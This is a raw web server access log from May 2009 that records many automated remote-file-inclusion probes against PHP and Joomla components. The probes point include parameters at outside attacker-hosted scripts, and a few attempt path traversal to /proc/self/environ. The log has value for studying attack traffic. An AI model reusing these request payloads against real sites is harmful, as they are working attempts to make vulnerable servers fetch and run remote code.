67.204.0.222 - - [13/May/2009:08:05:54 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
222.231.24.38 - - [13/May/2009:08:05:55 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:08:05:55 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:08:05:55 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:08:05:56 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:08:05:58 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:05:59 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:05:59 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.251.169.83 - - [13/May/2009:08:06:43 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
213.251.169.83 - - [13/May/2009:08:06:43 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
213.251.169.83 - - [13/May/2009:08:06:49 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
213.251.169.83 - - [13/May/2009:08:06:50 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:07:15 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:07:16 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
74.55.156.2 - - [13/May/2009:08:07:39 -0500] "GET /logs/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:08:07:39 -0500] "GET /errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.820"
66.249.67.180 - - [13/May/2009:08:07:44 -0500] "GET /logs/access_log.1209081600 HTTP/1.1" 200 1545 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [13/May/2009:08:07:56 -0500] "GET /logs/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:08:07:56 -0500] "GET /errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.215.4.114 - - [13/May/2009:08:08:12 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kimstroy.by//assets/images/_MD.TXT??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
67.204.0.222 - - [13/May/2009:08:08:30 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:08:34 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:08:35 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:08:35 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
151.1.154.24 - - [13/May/2009:08:10:37 -0500] "GET /logs//index.php?meio=http://www.kimstroy.by//assets/images/rox.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
151.1.154.24 - - [13/May/2009:08:10:37 -0500] "GET //index.php?meio=http://www.kimstroy.by//assets/images/rox.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:08:11:11 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:11:12 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:11:32 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 189195 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:11:38 -0500] "GET //?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
194.126.175.23 - - [13/May/2009:08:12:01 -0500] "GET /logs/errors.php?error=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.822"
194.126.175.23 - - [13/May/2009:08:12:01 -0500] "GET /errors.php?error=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.822"
212.150.52.114 - - [13/May/2009:08:12:12 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:08:12:12 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:08:12:12 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:08:12:12 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
194.126.175.23 - - [13/May/2009:08:12:14 -0500] "GET /logs/errors.php?error=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.822"
194.126.175.23 - - [13/May/2009:08:12:14 -0500] "GET /errors.php?error=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.822"
67.204.0.222 - - [13/May/2009:08:12:37 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:12:37 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:08:12:59 -0500] "GET /logs/access_log.1195084800 HTTP/1.1" 200 18771 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.55.156.2 - - [13/May/2009:08:13:23 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:08:13:23 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.820"
218.249.36.194 - - [13/May/2009:08:13:30 -0500] "GET /logs/access_log.1238889600/modules/My_eGallery/index.php?basepath=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.249.36.194 - - [13/May/2009:08:13:31 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.249.36.194 - - [13/May/2009:08:13:31 -0500] "GET /modules/My_eGallery/index.php?basepath=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.249.36.194 - - [13/May/2009:08:13:43 -0500] "GET /logs/access_log.1230940800/modules/My_eGallery/index.php?basepath=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.135.14 - - [13/May/2009:08:14:23 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:08:14:23 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
201.234.41.5 - - [13/May/2009:08:14:50 -0500] "GET /logs/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:08:14:50 -0500] "GET /errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.204.0.222 - - [13/May/2009:08:15:22 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:15:23 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.18.76.16 - - [13/May/2009:08:16:05 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:08:16:06 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:08:17:23 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:17:24 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.18.76.16 - - [13/May/2009:08:17:42 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:08:17:42 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
74.55.156.2 - - [13/May/2009:08:18:02 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:08:18:02 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.820"
66.249.67.180 - - [13/May/2009:08:18:16 -0500] "GET /logs/access_log.1209600000 HTTP/1.1" 200 525 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.76.47.224 - - [13/May/2009:08:18:48 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:08:18:48 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:08:18:48 -0500] "GET //guestbook1//admin.php?include_path=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:08:18:49 -0500] "GET //guestbook1//admin.php?include_path=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
212.150.52.114 - - [13/May/2009:08:18:57 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:08:18:57 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:08:18:57 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:08:19:01 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
194.126.175.23 - - [13/May/2009:08:19:14 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.822"
194.126.175.23 - - [13/May/2009:08:19:17 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.822"
194.126.175.23 - - [13/May/2009:08:19:37 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.822"
194.126.175.23 - - [13/May/2009:08:19:37 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.822"
74.55.156.2 - - [13/May/2009:08:19:52 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:08:19:52 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.820"
67.204.0.222 - - [13/May/2009:08:20:37 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:20:38 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
194.126.175.23 - - [13/May/2009:08:20:53 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.822"
194.126.175.23 - - [13/May/2009:08:20:53 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.822"
67.204.0.222 - - [13/May/2009:08:21:11 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:21:12 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
87.106.225.205 - - [13/May/2009:08:23:29 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.kimstroy.by//assets/images/pit-id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
87.106.225.205 - - [13/May/2009:08:23:29 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.kimstroy.by//assets/images/pit-id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:08:23:37 -0500] "GET /logs/access_log.1107302400 HTTP/1.1" 200 2857 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.126.175.23 - - [13/May/2009:08:24:08 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.822"
194.126.175.23 - - [13/May/2009:08:24:08 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.822"
67.204.0.222 - - [13/May/2009:08:24:12 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:24:13 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
194.126.175.23 - - [13/May/2009:08:25:14 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.822"
194.126.175.23 - - [13/May/2009:08:25:14 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.822"
122.153.212.195 - - [13/May/2009:08:25:23 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:08:25:27 -0500] "GET /modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:08:25:28 -0500] "GET /logs/access_log.1238889600/modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
194.126.175.23 - - [13/May/2009:08:25:44 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.822"
194.126.175.23 - - [13/May/2009:08:25:44 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ccpe.or.th//r0x.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.822"
122.153.212.195 - - [13/May/2009:08:26:03 -0500] "GET /logs/access_log.1230940800/modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:08:26:20 -0500] "GET /modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:08:26:20 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:08:26:20 -0500] "GET /logs/access_log.1238889600/modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:08:26:20 -0500] "GET /logs/access_log.1230940800/modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
201.234.41.5 - - [13/May/2009:08:27:09 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:08:27:10 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
217.18.76.16 - - [13/May/2009:08:28:14 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:08:28:15 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:08:28:51 -0500] "GET /logs/access_log.1120089600 HTTP/1.1" 200 435 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
90.156.148.171 - - [13/May/2009:08:28:58 -0500] "GET /logs/access_log.1230249600///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
90.156.148.171 - - [13/May/2009:08:28:58 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
90.156.148.171 - - [13/May/2009:08:29:00 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 189196 "-""Mozilla/5.0"
67.225.245.33 - - [13/May/2009:08:31:39 -0500] "GET //main.php?pagina=http://www.centrodeperfumes.com/images/baner.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.225.245.33 - - [13/May/2009:08:31:39 -0500] "GET /logs//main.php?pagina=http://www.centrodeperfumes.com/images/baner.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.225.245.33 - - [13/May/2009:08:31:39 -0500] "GET /logs/access_log.1236384000//main.php?pagina=http://www.centrodeperfumes.com/images/baner.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.225.245.33 - - [13/May/2009:08:31:59 -0500] "GET /logs/access_log.1234051200//main.php?pagina=http://www.centrodeperfumes.com/images/baner.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.117.191.71 - - [13/May/2009:08:33:22 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:08:33:22 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
66.249.67.180 - - [13/May/2009:08:34:08 -0500] "GET /logs/access_log.1141344000 HTTP/1.1" 200 2932 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [13/May/2009:08:34:27 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:08:34:27 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
74.55.156.2 - - [13/May/2009:08:34:35 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:08:34:35 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.820"
61.67.196.130 - - [13/May/2009:08:35:51 -0500] "GET /logs//jscript.php?my_ms[root]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.67.196.130 - - [13/May/2009:08:35:52 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
61.67.196.130 - - [13/May/2009:08:35:53 -0500] "GET /logs//jscript.php?my_ms[root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 300 "-""XXXXXX"
61.67.196.130 - - [13/May/2009:08:35:56 -0500] "GET //jscript.php?my_ms[root]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.67.196.130 - - [13/May/2009:08:35:57 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
61.67.196.130 - - [13/May/2009:08:35:58 -0500] "GET //jscript.php?my_ms[root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-""XXXXXX"
61.67.196.130 - - [13/May/2009:08:35:58 -0500] "GET /logs//jscript.php?my_ms[root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""XXXXXX"
61.67.196.130 - - [13/May/2009:08:35:59 -0500] "GET //jscript.php?my_ms[root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""XXXXXX"
67.15.206.26 - - [13/May/2009:08:36:40 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
67.15.206.26 - - [13/May/2009:08:36:40 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
67.15.206.26 - - [13/May/2009:08:36:47 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
67.15.206.26 - - [13/May/2009:08:36:47 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
